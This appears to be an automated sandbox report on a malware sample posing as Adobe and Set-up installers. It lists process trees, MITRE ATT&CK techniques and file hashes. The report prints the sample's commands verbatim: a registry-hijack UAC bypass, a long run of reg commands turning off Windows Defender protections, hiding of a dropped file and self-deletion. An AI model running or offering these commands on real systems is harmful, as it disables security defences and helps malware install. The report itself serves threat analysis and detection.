fc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	Set-up.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
784	PING.EXE
2480	PING.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2720	Adobe.tmp
2720	Adobe.tmp

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeRestorePrivilege	1912	7z.exe
Token: 35	1912	7z.exe
Token: SeSecurityPrivilege	1912	7z.exe
Token: SeSecurityPrivilege	1912	7z.exe
Token: SeRestorePrivilege	2620	7z.exe
Token: 35	2620	7z.exe
Token: SeSecurityPrivilege	2620	7z.exe
Token: SeSecurityPrivilege	2620	7z.exe
Token: SeRestorePrivilege	236	7z.exe
Token: 35	236	7z.exe
Token: SeSecurityPrivilege	236	7z.exe
Token: SeSecurityPrivilege	236	7z.exe
Token: SeRestorePrivilege	2156	7z.exe
Token: 35	2156	7z.exe
Token: SeSecurityPrivilege	2156	7z.exe
Token: SeSecurityPrivilege	2156	7z.exe
Token: SeRestorePrivilege	2636	7z.exe
Token: 35	2636	7z.exe
Token: SeSecurityPrivilege	2636	7z.exe
Token: SeSecurityPrivilege	2636	7z.exe
Token: SeRestorePrivilege	1904	7z.exe
Token: 35	1904	7z.exe
Token: SeSecurityPrivilege	1904	7z.exe
Token: SeSecurityPrivilege	1904	7z.exe
Token: SeRestorePrivilege	2736	7z.exe
Token: 35	2736	7z.exe
Token: SeSecurityPrivilege	2736	7z.exe
Token: SeSecurityPrivilege	2736	7z.exe
Token: SeRestorePrivilege	3060	7z.exe
Token: 35	3060	7z.exe
Token: SeSecurityPrivilege	3060	7z.exe
Token: SeSecurityPrivilege	3060	7z.exe
Token: SeRestorePrivilege	2696	7z.exe
Token: 35	2696	7z.exe
Token: SeSecurityPrivilege	2696	7z.exe
Token: SeSecurityPrivilege	2696	7z.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
2720	Adobe.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 2368 wrote to memory of 1764	2368	889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe	31
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2756	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	32
PID 1764 wrote to memory of 2792	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 1764 wrote to memory of 2792	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 1764 wrote to memory of 2792	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 1764 wrote to memory of 2792	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	33
PID 1764 wrote to memory of 2584	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	34
PID 1764 wrote to memory of 2584	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	34
PID 1764 wrote to memory of 2584	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	34
PID 1764 wrote to memory of 2584	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	34
PID 1764 wrote to memory of 2716	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 1764 wrote to memory of 2716	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 1764 wrote to memory of 2716	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 1764 wrote to memory of 2716	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	37
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 2756 wrote to memory of 2720	2756	Adobe.exe	38
PID 1764 wrote to memory of 2560	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	39
PID 1764 wrote to memory of 2560	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	39
PID 1764 wrote to memory of 2560	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	39
PID 1764 wrote to memory of 2560	1764	889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp	39
PID 2792 wrote to memory of 264	2792	cmd.exe	40
PID 2792 wrote to memory of 264	2792	cmd.exe	40
PID 2792 wrote to memory of 264	2792	cmd.exe	40
PID 2792 wrote to memory of 264	2792	cmd.exe	40
PID 2716 wrote to memory of 580	2716	WScript.exe	41
PID 2716 wrote to memory of 580	2716	WScript.exe	41
PID 2716 wrote to memory of 580	2716	WScript.exe	41
PID 2716 wrote to memory of 580	2716	WScript.exe	41
PID 2792 wrote to memory of 1744	2792	cmd.exe	43
PID 2792 wrote to memory of 1744	2792	cmd.exe	43
PID 2792 wrote to memory of 1744	2792	cmd.exe	43
PID 2792 wrote to memory of 1744	2792	cmd.exe	43
PID 2560 wrote to memory of 1612	2560	WScript.exe	44
PID 2560 wrote to memory of 1612	2560	WScript.exe	44
PID 2560 wrote to memory of 1612	2560	WScript.exe	44
PID 2560 wrote to memory of 1612	2560	WScript.exe	44
PID 2584 wrote to memory of 1816	2584	cmd.exe	45
PID 2584 wrote to memory of 1816	2584	cmd.exe	45
PID 2584 wrote to memory of 1816	2584	cmd.exe	45
PID 2584 wrote to memory of 1816	2584	cmd.exe	45
PID 2584 wrote to memory of 2360	2584	cmd.exe	46
PID 2584 wrote to memory of 2360	2584	cmd.exe	46
PID 2584 wrote to memory of 2360	2584	cmd.exe	46
PID 2584 wrote to memory of 2360	2584	cmd.exe	46
PID 2584 wrote to memory of 1736	2584	cmd.exe	48
PID 2584 wrote to memory of 1736	2584	cmd.exe	48
PID 2584 wrote to memory of 1736	2584	cmd.exe	48

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2596	attrib.exe

C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Users\Admin\AppData\Local\Temp\is-I7O8V.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-I7O8V.tmp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.tmp" /SL5="$50150,9875652,804864,C:\Users\Admin\AppData\Local\Temp\889956cee776d41937c39e225d3e72b6_JaffaCakes118.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:1764
- - C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe
    "C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2756
  - - C:\Users\Admin\AppData\Local\Temp\is-27UUF.tmp\Adobe.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-27UUF.tmp\Adobe.tmp" /SL5="$901AE,5833262,804864,C:\Program Files (x86)\WindowsPowerShell\Configuration\Adobe.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      PID:2720
    - - C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe
        
        "C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        Modifies system certificate store
        
        PID:2588
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\wu10.uac.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:280
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
        6⤵
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:1940
      - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
        6⤵
        Modifies registry class
        
        PID:1812
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\wu10.wdcloud.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1108
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2412
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2192
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:708
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2288
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2176
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:1972
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:1440
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:824
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        System Location Discovery: System Language Discovery
        
        PID:2080
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3064
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        6⤵
        
        PID:3052
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2344
      - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:900
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
        6⤵
        
        PID:3020
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1800
      - C:\Windows\SysWOW64\reg.exe
        
        reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1460
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1588
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\main.bat" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:620
        
        C:\Windows\SysWOW64\mode.com
        
        mode 65,10
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2264
        
        C:\ProgramData\7z.exe
        
        7z.exe e file.zip -p___________1903pwd1764pwd14586___________ -oextracted
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1656
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\ProgramData\wu10.delete.bat" "
        6⤵
        
        PID:1128
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 60 127.1
        7⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2480
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\ProgramData\wu10.uac.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2792
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKCU\SOFTWARE\Classes\ms-settings\shell\open\command" /t REG_SZ /d "C:\windows\system32\cmd.exe /c REG ADD HKLM\software\microsoft\windows\currentversion\policies\system /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f" /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:264
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "hkcu\software\classes\ms-settings\shell\open\command" /v DelegateExecute /t REG_SZ /d " " /f
      4⤵
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\ProgramData\wu10.wdcloud.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2584
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:1816
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2360
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1736
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:1232
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1692
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1924
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1480
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1572
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      System Location Discovery: System Language Discovery
      PID:1592
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2012
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:816
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2876
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2840
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2788
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:3004
  - - C:\Windows\SysWOW64\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      4⤵
      PID:2240
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.run.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2716
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\main.bat" "
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:580
    - - C:\Windows\SysWOW64\mode.com
        
        mode 65,10
        5⤵
        
        PID:648
    - - C:\ProgramData\7z.exe
        
        7z.exe e file.zip -p___________27117pwd32413pwd32179___________ -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_7.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_6.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:236
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_5.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2636
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_4.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1904
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_3.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2736
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_2.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:3060
    - - C:\ProgramData\7z.exe
        
        7z.exe e extracted/file_1.zip -oextracted
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:2696
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +H "00008.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:2596
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\ProgramData\wu10.2run.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2560
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\ProgramData\wu10.delete.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:1612
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 60 127.1
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:784
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1088
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del 7z.dll"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2872
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del 7z.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:816
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2876
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del main.bat"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1912
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2840
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del file.bin"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2788
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2880
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:968
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1680
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.2run.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1704
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2084
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.uac.bat"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2100
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2060
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.wdcloud.bat"
        5⤵
        
        PID:2240
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:2884
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" del wu10.delete.bat"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\WindowsPowerShell\Configuration\Set-up.exe

Filesize
7.3MB

MD5
de70f0deed893bba56ccb78eafd59606

SHA1
f351b0c2996a3573d36deab9b6b3961876189f71

SHA256
b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d

SHA512
86459d1e7ba8480cf005087450d7dcf969dcd6f6fd228012d7542539ff74d72105a35b3a8d8216e1b44cdee21730a1ddb32d9b5d20073099cb4da5a56c77fc41

Download Submit
C:\ProgramData\7z.dll

Filesize
1.6MB

MD5
72491c7b87a7c2dd350b727444f13bb4

SHA1
1e9338d56db7ded386878eab7bb44b8934ab1bc7

SHA256
34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

SHA512
583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

Download Submit
C:\ProgramData\7z.exe

Filesize
458KB

MD5
619f7135621b50fd1900ff24aade1524

SHA1
6c7ea8bbd435163ae3945cbef30ef6b9872a4591

SHA256
344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

SHA512
2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

Download Submit
C:\ProgramData\extracted\123.exe

Filesize
1.1MB

MD5
1ec2d07dfed88c9740b4fc575b667646

SHA1
b01d9d4ea36db6007e3f3f46c41b4cc71e2a4b70

SHA256
46c0fced58c4190739fdb56a3914bcc7b8bf9a2fd8a1ad480fffa4d05c5a620d

SHA512
a572764544b72560cdc9b804b3ae358e8b7731d6432c7a2f0ba3831950b969a1e55df458108bb7ffbaad35a95778ff01e44bdfa557d95e0be1939a871a926913

Download Submit
C:\ProgramData\extracted\ANTIAV~1.DAT

Filesize
2.0MB

MD5
1334c46a0162f10b2dc650ce10129ef6

SHA1
d3a27b0dd33ad45930f7d964ca82ef6920f81d64

SHA256
081a4d9b98b096147c0f1225a7fff9bc20b984f7469443d32738641e7326642b

SHA512
24e1ba20566ccc059a2e2df68ec1e22fa4a54ae5299efdc0c7df271459b4c96942d6410faa48f52aec15a68132c1bb9830cdcaaaaa527f7870c6e83ca8bcefa3

Download Submit
C:\ProgramData\extracted\file_1.zip

Filesize
814KB

MD5
66f81adc3394431d519b2a74fa8c9b6f

SHA1
